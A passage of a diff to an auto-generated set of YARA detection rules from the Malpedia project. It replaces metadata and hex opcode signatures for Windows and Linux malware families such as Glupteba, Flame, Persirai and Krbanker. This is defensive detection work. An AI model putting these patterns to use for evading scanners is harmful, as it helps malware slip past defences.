= "2022-11-25" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_063" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_063_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "7f3078493ad3e901d3230994f499bb2b8f95c8666fe5cee6d8f3649c308a4e21" + logic_hash = "14c180eecdf0e6fbf2b936d6c444ad58c2e649e1fa770106e8719057ee1aefbd" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" + malpedia_rule_date = "20221118" + malpedia_hash = "e0702e2e6d1d00da65c8a29a4ebacd0a4c59e1af" + malpedia_version = "20221125" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffd6 85c0 7512 e8???????? eb03 } - $sequence_1 = { e8???????? b910270000 e8???????? e8???????? } - $sequence_2 = { c605????????01 c3 c605????????00 c3 } - $sequence_3 = { 83f8ff 7505 e8???????? 3d34270000 } - $sequence_4 = { ffd0 85c0 751f e8???????? } - $sequence_5 = { ffd0 e8???????? 85c0 74de } - $sequence_6 = { 53 53 53 6a01 53 ffd0 } - $sequence_7 = { eb0a e8???????? eb03 6a7f 58 } - $sequence_8 = { c3 31c0 c3 50 } - $sequence_9 = { 7406 42 803a00 75fa } - $sequence_10 = { 7403 56 ffd0 33f6 } - $sequence_11 = { e8???????? 85c0 7407 56 ffd0 } - $sequence_12 = { 807c241400 7409 8d4c2410 e8???????? } - $sequence_13 = { e8???????? 6880000000 53 53 } - $sequence_14 = { e8???????? 85c0 7408 6a00 ffd0 } - $sequence_15 = { e8???????? 6a00 8d4e1c e8???????? } - $sequence_16 = { e8???????? eb0a b9d0070000 e8???????? } - $sequence_17 = { ffd0 5b c3 33c0 } - $sequence_18 = { c70350000000 eb0d 3da665f63e 7506 } - $sequence_19 = { e8???????? 85c0 7404 6a7f } - $sequence_20 = { 85c0 7407 685a040000 ffd0 } - $sequence_21 = { e8???????? 3db20d7897 7508 c70350000000 } - $sequence_22 = { 8bc8 e8???????? 6a70 8bc8 e8???????? 6a73 8bc8 } - $sequence_23 = { 50 e8???????? 8938 8b35???????? } - $sequence_24 = { 6a00 6a00 8d4dfc 51 6aff } - $sequence_25 = { e8???????? 6a74 8bc8 e8???????? 6a74 8bc8 } - $sequence_26 = { 6810270000 50 e8???????? 83c410 } - $sequence_27 = { 7411 c7461003000000 e8???????? 894614 } - $sequence_28 = { 85c0 7415 6a01 6a00 6a00 } - $sequence_29 = { 6a00 8bcf e8???????? 50 ffd6 } - $sequence_30 = { eb08 83ca20 eb03 83ca10 } - $sequence_31 = { 46 e8???????? c1e802 3bf0 } - $sequence_32 = { e8???????? e9???????? 807c245000 740a } - $sequence_33 = { e8???????? 8d4dc4 e8???????? 5e } - $sequence_34 = { 6802100000 68ffff0000 ff36 ffd0 } - $sequence_35 = { ffd0 85c0 7510 e8???????? } - $sequence_36 = { c20400 55 8bec 83ec34 8365fc00 } - $sequence_37 = { 89442404 eb00 8b442404 89c1 89ca } - $sequence_38 = { 7414 31c0 89c1 8b442424 88c2 8854240f } - $sequence_39 = { 8b442428 6689c1 66894c2458 66894c245a } - $sequence_40 = { 8a442427 a801 7534 eb00 31c0 89c1 } - $sequence_41 = { 6a64 59 e8???????? 33c9 e8???????? } - $sequence_42 = { 51 6801100000 68ffff0000 ff36 } - $sequence_43 = { 7406 6a02 ff36 ffd0 } - $sequence_44 = { 740d 40 83c104 3d00100000 } - $sequence_45 = { 885c2407 89442408 7598 8a442407 a801 } - $sequence_46 = { c7461002000000 eb0f c7461003000000 e8???????? } - $sequence_47 = { 890424 894c2404 75dd 8b0424 } - $sequence_48 = { e8???????? 50 56 8bcb e8???????? 50 e8???????? } - $sequence_49 = { 8954242c 8b44242c 89c1 89ca } - $sequence_50 = { eb0a b988130000 e8???????? 33d2 } - $sequence_51 = { 740a 488d4c2448 e8???????? 488d4c2430 e8???????? e9???????? } - $sequence_52 = { e8???????? 84c0 740f 6a05 } - $sequence_53 = { e8???????? 8be8 85ed 7458 } - $sequence_54 = { e8???????? 6880000000 55 55 } - $sequence_55 = { ff7508 ffd0 33c0 40 5d } - $sequence_56 = { c3 55 8bec 837d0800 7422 } - $sequence_57 = { 8d4de0 51 68???????? ffd0 } - $sequence_58 = { 6a73 e8???????? 833f00 7523 } - $sequence_59 = { 6a00 6a02 ffd0 50 } - $sequence_60 = { e8???????? 8bc8 a1???????? ff30 } - $sequence_61 = { 5e c3 31c0 89c2 } - $sequence_62 = { e8???????? 50 ffd7 85c0 7512 } - $sequence_63 = { eb0c e8???????? 8bf0 eb03 6a7f 5e } - $sequence_64 = { 8b45cc 31c9 8b55d0 39c2 } - $sequence_65 = { 8038e9 89c1 8945d0 894dcc } - $sequence_66 = { e8???????? 50 53 8d4dd0 e8???????? 50 } - $sequence_67 = { 8b45e8 05ffff0000 25ffff0000 83c001 } - $sequence_68 = { 8b4de8 81c1ffff0000 81e1ffff0000 83c101 } - $sequence_69 = { 50 8b442408 8038e9 890424 7517 8b0424 8b4801 } - $sequence_70 = { 8b704c 2b7134 891424 89742404 894c2418 e8???????? } - $sequence_71 = { 8b55bc 8955c4 776a 31c0 8b4dac 8b510c } - $sequence_72 = { 807c0805e9 891424 74e9 8b0424 } - $sequence_73 = { 8b450c 8b4d08 8b503c 6689d6 6683fe00 89c7 8945f0 } - $sequence_74 = { 83c001 8b4de8 01c1 894de0 } - $sequence_75 = { 7517 8b0424 8b4801 89c2 01ca 83c205 } - $sequence_76 = { 8b513c 6689d6 6683fe00 89cf 8945f0 894dec } - $sequence_77 = { 01ca 83c205 807c0805e9 891424 } - $sequence_78 = { 89c7 8945f0 894dec 8955e8 897de4 } - $sequence_79 = { 5b 5e 5d c3 55 89e5 6a00 } - $sequence_80 = { 83c001 8b4df8 01c1 894df0 8b45f0 } - $sequence_81 = { 83c454 5b 5e 5f 5d c3 55 } - $sequence_82 = { 894df0 8b45f0 83c40c 5e } - $sequence_83 = { e9???????? 8b45e0 83c438 5f } - $sequence_84 = { 8945f8 894df4 8975f0 7418 8b45f4 05ffff0000 } - $sequence_85 = { 25ffff0000 83c001 8b4da8 01c1 } - $sequence_86 = { 8945c4 894dc0 885dbf 8975b8 } - $sequence_87 = { c3 55 89e5 57 56 53 83ec54 } - $sequence_88 = { 5b 5d c3 8b45d0 8b4dd4 668b55d8 31f6 } - $sequence_89 = { 8b45e0 83c45c 5f 5b 5e 5d } - $sequence_90 = { 53 56 83ec38 8b450c 8b4d08 } - $sequence_91 = { c7424800b00400 8b7c2418 c787cc00000000000000 c787c800000000000000 } - $sequence_92 = { 8955cc 74bc 8b45cc 83c454 5b 5e } - $sequence_93 = { 6a00 e8???????? 83c408 c3 6a00 68???????? } - $sequence_94 = { 8d442448 b91c000000 8b542438 891424 89442404 c74424081c000000 894c2434 } - $sequence_95 = { 893c24 89442404 c744240804000000 8954240c 89ac248c000000 898c2488000000 } - $sequence_96 = { 8945c8 75e4 83c448 5e 5f 5b 5d } - $sequence_97 = { 53 83ec74 8b450c 8b4d08 31d2 8b713c } - $sequence_98 = { 0f85dafeffff 8b45e4 83c474 5b } - $sequence_99 = { 55 89e5 56 57 53 83ec70 } - $sequence_100 = { 53 81ecb0000000 8b4508 8d4dd8 c745d800000000 } - $sequence_101 = { 5b 5d c3 8b45f0 8b0c8504406e00 8b55f8 39d1 } - $sequence_102 = { 8b0c8504406e00 8b55f8 39d1 8945ec 894de8 7212 } - $sequence_103 = { 83f900 89442464 0f84f2010000 b801000000 8b4c2468 8b91a4000000 } - $sequence_104 = { 83c470 5b 5f 5e 5d c3 } - $sequence_105 = { 8b45e0 83c438 5e 5b } - $sequence_106 = { 57 83ec20 8b4508 890424 } - $sequence_107 = { 890424 e8???????? 31c0 83c420 5f } - $sequence_108 = { c7424800c00400 8b7de4 c787cc00000000000000 c787c800000000000000 } - $sequence_109 = { 897dd8 8b45d8 83c444 5b 5e 5f } - $sequence_110 = { e8???????? 8d0d44306e00 31d2 8b75f8 89462c } - $sequence_111 = { 894620 890c24 c744240400000000 8955e0 e8???????? 8d0dd8306e00 890424 } - $sequence_112 = { 8d155e306e00 83ec04 891424 8945e8 894de4 } - $sequence_113 = { 8b55f4 8b75ec 89723c c7424004000000 c742442c0c0200 c7424800b00400 } - $sequence_114 = { 55 89e5 53 56 57 83ec38 8b450c } - $sequence_115 = { c742442c0c0200 c7424800b00400 8b7de4 c787cc00000000000000 } - $sequence_116 = { 8d0dbc306e00 890424 894c2404 e8???????? 8d0d44306e00 } - $sequence_117 = { 74bc 8b45cc 83c454 5f 5b 5e } - $sequence_118 = { 0f84e2feffff e9???????? 8b45e0 83c45c 5e 5f 5b } - $sequence_119 = { 56 53 57 83ec44 8b4508 } - $sequence_120 = { 8955e0 e8???????? 8d0dd8302700 890424 } - $sequence_121 = { 89462c 890c24 c744240400000000 8955d8 e8???????? 8d0d04318400 } - $sequence_122 = { c7424004000000 c7424499040200 c7424800c00400 8b7de4 } - $sequence_123 = { c3 55 89e5 83ec10 8b4508 8d0d44302500 } - $sequence_124 = { 56 83ec44 8b4508 8d0d30302500 31d2 890c24 } - $sequence_125 = { 31c0 8d0d5a232f00 8b55c8 39ca 8945cc 0f84f9000000 } - $sequence_126 = { 890c24 c744240400000000 8955e4 e8???????? 8d0dc9302f00 890424 894c2404 } - $sequence_127 = { 8d0d44302f00 31d2 8b75f8 894608 890c24 c744240400000000 } - $sequence_128 = { 8d0d30302700 31d2 890c24 c744240400000000 8945f0 8955ec e8???????? } + $sequence_0 = { 8d43cf 83f819 770c 6689b550030000 e9???????? } + $sequence_1 = { 7363 488bf3 4c8d35dfc40100 83e63f 488beb 48c1fd06 48c1e606 } + $sequence_2 = { e8???????? 4863f8 488d3588800100 488bcb } + $sequence_3 = { 0f11442478 4c8b4708 488d442470 493bc0 7362 488b07 488d4c2470 } + $sequence_4 = { 4885c9 7407 48ff25???????? c3 48894c2408 57 4883ec50 } + $sequence_5 = { 83f801 7518 488b0d???????? 488d05bf5f0100 483bc8 7405 e8???????? } + $sequence_6 = { 8b8c96d0cd0200 8b534c 33c8 0fb6c1 } + $sequence_7 = { 0f84e7000000 488b0e 483bc8 740e 4885c9 7406 } + $sequence_8 = { 498bc2 418be9 48c1f806 488d0d708c0100 4183e23f 4903e8 } + $sequence_9 = { 488d158a5a0200 488bcb e8???????? 85c0 7499 488d157f5a0200 488bcb } condition: - 7 of them and filesize <1040384 + 7 of them and filesize <475136 } -rule MALPEDIA_Win_Mosaic_Regressor_Auto : FILE +rule MALPEDIA_Elf_Persirai_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6545d5ce-704c-5c00-a6cd-ec1b5c909576" + id = "a8d888a8-efae-5fcd-8298-ba3399d89281" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosaic_regressor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mosaic_regressor_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.persirai_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "73c7fd14f8effd7ac9e0816b586de74eff8d0d21c8391e8e84f2921e57196fdb" + logic_hash = "091433f152a0a1932173079b7afa5457b62363ecd6425f8d1d7de8df73a8fbb4" score = 75 quality = 75 tags = "FILE" @@ -148262,32 +151056,32 @@ rule MALPEDIA_Win_Mosaic_Regressor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 670010 386700 1023 d18a0688078a } - $sequence_1 = { 8975e0 8db1d0a70010 8975e4 eb2a } - $sequence_2 = { 85c0 7456 8b4de0 8d0c8de0b70010 8901 8305????????20 } - $sequence_3 = { f3a4 6a1c 8d8c2480060000 51 6a00 ffd5 8d842478060000 } - $sequence_4 = { 8d442460 50 6a00 ffd5 8d442458 48 8d4900 } - $sequence_5 = { 895008 8d542458 52 88480c } - $sequence_6 = { c744241444000000 8bc8 90 8a10 } - $sequence_7 = { 6a06 89430c 8d4310 8d89c4a70010 5a } - $sequence_8 = { 8bff 55 8bec 8b4508 ff34c578a10010 ff15???????? 5d } - $sequence_9 = { 6a00 6a00 6a00 8d942498080000 } + $sequence_0 = { c3 c3 53 83ec08 e8???????? 31d2 8b5c2414 } + $sequence_1 = { 8b5c2410 837c241400 740b 83ec0c ff7304 ff13 83c410 } + $sequence_2 = { 50 52 e8???????? 58 8d8424d8170000 50 e8???????? } + $sequence_3 = { 8d4400e0 50 e8???????? 89c2 a3???????? 83c410 83c8ff } + $sequence_4 = { 817c2414ff030000 0f8770030000 8b442414 c1e004 83b888a2050800 0f85df000000 8b0d???????? } + $sequence_5 = { c7042408000000 50 a1???????? 6a1a 6a01 50 e8???????? } + $sequence_6 = { 83c418 5b c3 81ecac000000 31d2 a1???????? } + $sequence_7 = { 85c0 74cb e8???????? 52 52 8b00 } + $sequence_8 = { c680b901000000 8b45f0 e8???????? 89f0 8b55f0 e8???????? 8b45f0 } + $sequence_9 = { 83c004 89442418 e9???????? bf0a000000 e9???????? bf10000000 e9???????? } condition: - 7 of them and filesize <113664 + 7 of them and filesize <229376 } -rule MALPEDIA_Win_Phoreal_Auto : FILE +rule MALPEDIA_Win_Krbanker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "edae0032-d1e1-5b3c-8d3f-ebef8f58d4b7" + id = "236e4eb3-f9a9-5a5c-939d-2dd344c94ac6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.phoreal_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.krbanker_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "d8f5fe4e88399cfa18864e41db820daba4b617ffb107b587cb04424a8ab682db" + logic_hash = "d1369d0e33548d319048c3c036e2e47c22a922a80b7ada061139a11ddd9f8b91" score = 75 quality = 75 tags = "FILE" @@ -148301,32 +151095,32 @@ rule MALPEDIA_Win_Phoreal_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4c2414 51 8b4b04 8d542410 52 8d442418 50 } - $sequence_1 = { 8b570c 8d442440 6a00 50 895350 } - $sequence_2 = { 56 57 33ff 8bf0 8d4701 } - $sequence_3 = { 75c4 8d8de4fdffff c645fc02 e8???????? bf10000000 397de4 720c } - $sequence_4 = { 8b54245c 51 8b4c245c 52 8b542458 51 48 } - $sequence_5 = { 03c3 83c9ff 2bc8 3bca } - $sequence_6 = { 8b7510 b90e000000 f3a5 5e 5f 8be5 5d } - $sequence_7 = { 6a01 6a00 6a00 51 50 ff15???????? 85c0 } - $sequence_8 = { 52 8d434e 50 8d434b 8d534d 8d4b4c 50 } - $sequence_9 = { 894de0 894de4 8b8d78fdffff 8d1447 51 52 } + $sequence_0 = { 83c404 58 8945dc 837ddc00 } + $sequence_1 = { 83c404 58 8945fc b8???????? 50 } + $sequence_2 = { 6801000000 bb40010000 e8???????? 83c410 8945c8 6801010080 6a00 } + $sequence_3 = { 0faf03 ebf5 8bc8 c3 55 8bec 83c4f4 } + $sequence_4 = { 75a4 dd442410 e8???????? 8ad8 } + $sequence_5 = { 7762 7415 3d04000080 7417 3d01010080 } + $sequence_6 = { bb40010000 e8???????? 83c410 8945cc ff75cc ff75d0 } + $sequence_7 = { 8a5c2410 8ac3 5e 5b c3 8b542410 83ec0c } + $sequence_8 = { 8b5dfc 83c304 895df8 8965f4 ff7514 } + $sequence_9 = { 03d8 895dd4 8b5df8 e8???????? } condition: - 7 of them and filesize <622592 + 7 of them and filesize <1826816 } -rule MALPEDIA_Win_Laziok_Auto : FILE +rule MALPEDIA_Win_Aukill_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1dcbce9e-9b01-55fc-82f2-025bf107fa98" + id = "a6d13b29-a1c3-5db7-ac5c-09009229e7b9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.laziok_auto.yar#L1-L101" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aukill" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.aukill_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "8a49fb3e99a85f8254a739f5aaca9e9bb1b5be0f2dd72574e619043b4fccb1ed" + logic_hash = "ebc3504ab44ddd68fe35d4be4361ca674b2d7f3006cec23148755c773291be1b" score = 75 quality = 75 tags = "FILE" @@ -148340,30 +151134,32 @@ rule MALPEDIA_Win_Laziok_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85f6 740b 837c240cff 8937 7502 } - $sequence_1 = { 47 68???????? 57 e8???????? 8bf0 59 } - $sequence_2 = { 8d85f4fdffff 50 e8???????? 33c0 668945fc } - $sequence_3 = { 68ffffff1f 52 e8???????? 83c410 c3 } - $sequence_4 = { e8???????? 83c420 5b c20400 } - $sequence_5 = { 56 8b7508 833e01 7513 6a00 ff7510 ff750c } - $sequence_6 = { 39742410 741b ff742410 ff15???????? 8bf0 } - $sequence_7 = { 56 57 ff74240c 33f6 ff35???????? e8???????? } + $sequence_0 = { 85c0 751f 488b4c2458 ff15???????? } + $sequence_1 = { 0fb7da 8bf9 e8???????? 4c8bc8 4533c0 } + $sequence_2 = { 4533c0 33d2 488bcb ff15???????? 85c0 7526 488bcb } + $sequence_3 = { 4889442420 ff15???????? 85c0 751f 488b4c2458 ff15???????? } + $sequence_4 = { 751d 488bcb ff15???????? ff15???????? } + $sequence_5 = { 4489442420 453b01 7346 4b8d1440 410f104cd108 0f114c2428 f2410f1044d118 } + $sequence_6 = { 448d4920 48894c2450 488b0d???????? 48897c2458 } + $sequence_7 = { 488bd3 33c9 ff15???????? 85c0 751f } + $sequence_8 = { 48895c2408 57 4883ec60 488bfa 8bd9 e8???????? 33c9 } + $sequence_9 = { ffc2 80f920 75ee 4c63c2 } condition: - 7 of them and filesize <688128 + 7 of them and filesize <446464 } -rule MALPEDIA_Win_Glupteba_Auto : FILE +rule MALPEDIA_Win_Webc2_Yahoo_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "09a70f19-6d2a-5533-851a-d46346a3f052" + id = "63230a4f-7913-5b93-bb9a-30d89db03d73" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.glupteba_auto.yar#L1-L163" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_yahoo_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "f2320a7d413271b6097cf4accf3d3e4465e91ebbc62274538ef55443d4833776" + logic_hash = "f89dfba6353885aa09b69faf5df0db1655d3acae8a14a8bbfd9acb6fd6fd17df" score = 75 quality = 75 tags = "FILE" @@ -148377,38 +151173,32 @@ rule MALPEDIA_Win_Glupteba_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33c8 c1e102 33c8 03c9 } - $sequence_1 = { ff75dc ff7508 ff75e2 e8???????? 83c410 ff35???????? ff15???????? } - $sequence_2 = { 50 8d85fcf7ffff 50 56 e8???????? 68e8030000 8d85fcf7ffff } - $sequence_3 = { 59 7e17 83c0fc 33c9 85c0 7e0e } - $sequence_4 = { 334e04 8b75d0 33cf 8b7ddc c1ef08 c1ee10 } - $sequence_5 = { 85c0 0f8435010000 807df473 7550 0fb745f7 50 } - $sequence_6 = { 0f8f9c010000 894df8 ff7518 53 53 e8???????? } - $sequence_7 = { 46 8975f8 83f810 7cd9 8d48f0 f7d9 1bc9 } - $sequence_8 = { 0101 03d3 8b4620 8bcb } - $sequence_9 = { 00cd 3e46 005e3e 46 } - $sequence_10 = { 0107 eb4d 8b02 89442418 } - $sequence_11 = { 00f1 3d46005e3e 46 00cd } - $sequence_12 = { 0012 3f 46 008bff558bec } - $sequence_13 = { 0106 830702 392e 75a0 } - $sequence_14 = { 005e3e 46 00ff 3e46 } - $sequence_15 = { 00ff 3e46 0012 3f } + $sequence_0 = { 59 7513 ff15???????? 8986a0841e00 } + $sequence_1 = { 56 ff15???????? 802000 56 e8???????? } + $sequence_2 = { 53 50 50 53 ff750c ff15???????? 57 } + $sequence_3 = { 39be9c841e00 59 7513 ff15???????? 8986a0841e00 33c0 } + $sequence_4 = { c745fc01000000 aa e8???????? 59 8d85f4d7ffff 50 8d45f8 } + $sequence_5 = { 50 8d45f8 50 8d85f4afffff } + $sequence_6 = { 8b7518 83c414 8d85fcd7ffff 8bcb } + $sequence_7 = { 8b4d08 e8???????? 85c0 53 } + $sequence_8 = { 59 50 ff75f8 ff75fc ffb69c841e00 ff15???????? } + $sequence_9 = { 8d85c8fcffff 68???????? 50 e8???????? 83c410 85c0 7466 } condition: - 7 of them and filesize <1417216 + 7 of them and filesize <8060928 } -rule MALPEDIA_Win_Holerun_Auto : FILE +rule MALPEDIA_Win_Milum_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3860635a-d58f-5696-9faf-227bf0bff05b" + id = "a4720d6d-5a40-5b38-8cc6-14b0dce6d896" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.holerun" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.holerun_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.milum" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.milum_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "5a5dd43f05b56cbfa86f75c5f65da136c78c894cffec56359e16aa1bc679245f" + logic_hash = "3d087e33a30d06df9f4db7e1d4f924bf7ada8b431d51e99d5cf8912956a67294" score = 75 quality = 75 tags = "FILE" @@ -148422,32 +151212,32 @@ rule MALPEDIA_Win_Holerun_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 740c c785ec00000000000000 eb63 488b05???????? } - $sequence_1 = { e8???????? 8b45c4 83f840 7472 8b45c4 83f804 } - $sequence_2 = { c744242000010000 41b901000000 41b800000000 ba03000000 4889c1 } - $sequence_3 = { 488b85e0000000 488b4020 4889c1 488b05???????? ffd0 } - $sequence_4 = { ffd0 488b85e0000000 488b4020 4889c1 488b05???????? } - $sequence_5 = { ffd0 8b85cc030000 4881c458040000 5b 5d c3 } - $sequence_6 = { 4883c00f 48c1e804 48c1e004 e8???????? 4829c4 } - $sequence_7 = { eb1e 8345f401 488345f828 488b45e8 0fb74006 0fb7c0 } - $sequence_8 = { c705????????00000000 c705????????00000000 8b45fc 8905???????? } - $sequence_9 = { 488b4d10 e8???????? 4885c0 7507 b8ffffffff eb05 } + $sequence_0 = { 8db53cffffff e8???????? 83c41c c645fc20 50 8d4d90 e8???????? } + $sequence_1 = { 837b1800 0f8507010000 8b45f0 50 8d75dc e8???????? 837b1800 } + $sequence_2 = { 50 e8???????? 8bc6 eb0f 885dfc 8d8d34ffffff } + $sequence_3 = { 8b4dcc 8b55c8 83c40c c78574ffffff44000000 8945ac 894db4 814da001010000 } + $sequence_4 = { 8d8d10feffff e8???????? c645fc1e 8d8df4fdffff e8???????? c645fc1d } + $sequence_5 = { 2bc6 c7421803000000 89421c 395a18 0f849cfeffff ddd8 ddd8 } + $sequence_6 = { 6bc064 2bc8 8d045590a64600 0fb610 8816 0fb64001 884601 } + $sequence_7 = { 385f45 7503 895704 8b7a04 897e04 8b7804 3b5704 } + $sequence_8 = { 8bca eb0e 8b55e8 2bd1 8b4e44 8955d4 894ddc } + $sequence_9 = { 8d7508 83ec1c 8bcc 8bc6 c741140f000000 895910 896598 } condition: - 7 of them and filesize <156672 + 7 of them and filesize <1076224 } -rule MALPEDIA_Win_Flame_Auto : FILE +rule MALPEDIA_Win_Icefog_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f06c53ca-bcca-52e9-9b77-6f299afc1e85" + id = "048267f9-e0c5-52eb-96a2-fb16cbcf8de1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flame_auto.yar#L1-L154" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.icefog_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "6d731bccc4a2ab5daf3cc3b64a3620582f6b712bc70665127cfafd95a28c1921" + logic_hash = "1d4c21c23eefcc954f2b32ae717065ebcfe80845052716e0c9e4c85776b4e83c" score = 75 quality = 75 tags = "FILE" @@ -148461,37 +151251,32 @@ rule MALPEDIA_Win_Flame_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 741a 83f901 7415 e8???????? } - $sequence_1 = { 8b8ea4000000 48b8abaaaaaaaaaaaaaa 4c8bc5 48f7e1 } - $sequence_2 = { a3???????? 85c0 0f84c8fcffff 68???????? ff35???????? e8???????? } - $sequence_3 = { 744c 8b7518 ff75f8 8bce e8???????? 8b06 } - $sequence_4 = { 8b8ea0000000 48c1ea03 4803cd ff15???????? } - $sequence_5 = { ffd7 90 eb00 4883c430 5f 5e } - $sequence_6 = { 8b8ea0000000 4803cd ff15???????? 84c0 } - $sequence_7 = { 58 5e 5d c3 c701???????? c3 } - $sequence_8 = { 8b400c 83c006 50 ff15???????? 33db } - $sequence_9 = { 8365fc00 e9???????? b8???????? e8???????? } - $sequence_10 = { 7422 663b3b 0f94c0 84c0 } - $sequence_11 = { ff15???????? 85c0 742e 56 8b35???????? 8d4514 } - $sequence_12 = { 8b90b0000000 4903d3 eb64 448bc0 } - $sequence_13 = { 8b8c2490000000 8bc3 4823c8 8b348e eb27 f6c240 0f8539020000 } - $sequence_14 = { ff15???????? 834dfcff 8d4de0 e8???????? b001 } + $sequence_0 = { 80e3fb 899588feffff 33d2 80c327 85ff 0f94c2 85d2 } + $sequence_1 = { c78530ffffff05000000 eb0f 83f803 750a c78530ffffff02000000 8b4604 50 } + $sequence_2 = { 751e 8b4d0c 8d450c 50 57 51 e8???????? } + $sequence_3 = { 8bec 53 56 33f6 39770c 7e24 33db } + $sequence_4 = { 8b5108 8b45f4 03d3 52 53 50 6a03 } + $sequence_5 = { 50 e8???????? 8b0e 8d55d4 68ffffff7f 52 894de8 } + $sequence_6 = { 8b5610 0bf8 8b4508 52 50 e8???????? 8b4e18 } + $sequence_7 = { 50 51 e8???????? 8bd8 83c408 85db 0f841b010000 } + $sequence_8 = { e8???????? 53 e8???????? 53 57 e8???????? 83c42c } + $sequence_9 = { dfe0 ddd9 f6c441 0f8572010000 dd05???????? d8d1 dfe0 } condition: - 7 of them and filesize <1676288 + 7 of them and filesize <1187840 } -rule MALPEDIA_Win_Hotwax_Auto : FILE +rule MALPEDIA_Win_Ziyangrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "34df7b39-b5de-5d0e-aea3-1ec834745896" + id = "61b87837-dc98-50eb-8916-bc6cbc20d03f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hotwax_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ziyangrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ziyangrat_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "f7aa59232edd43ba4670389edd9f2f755cdf2f70e16334cd9db9000bdc1ab730" + logic_hash = "63664fb49a7b130cd77da76446f0977d6b37fb6657ee0279b7de100f4571b771" score = 75 quality = 75 tags = "FILE" @@ -148505,32 +151290,32 @@ rule MALPEDIA_Win_Hotwax_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7e74 817d0063736de0 7528 48833d????????00 741e 488d0d5dee0000 } - $sequence_1 = { 488bd7 ff15???????? 418d8770050000 4489bdcc040000 c745a400080000 8945a0 } - $sequence_2 = { 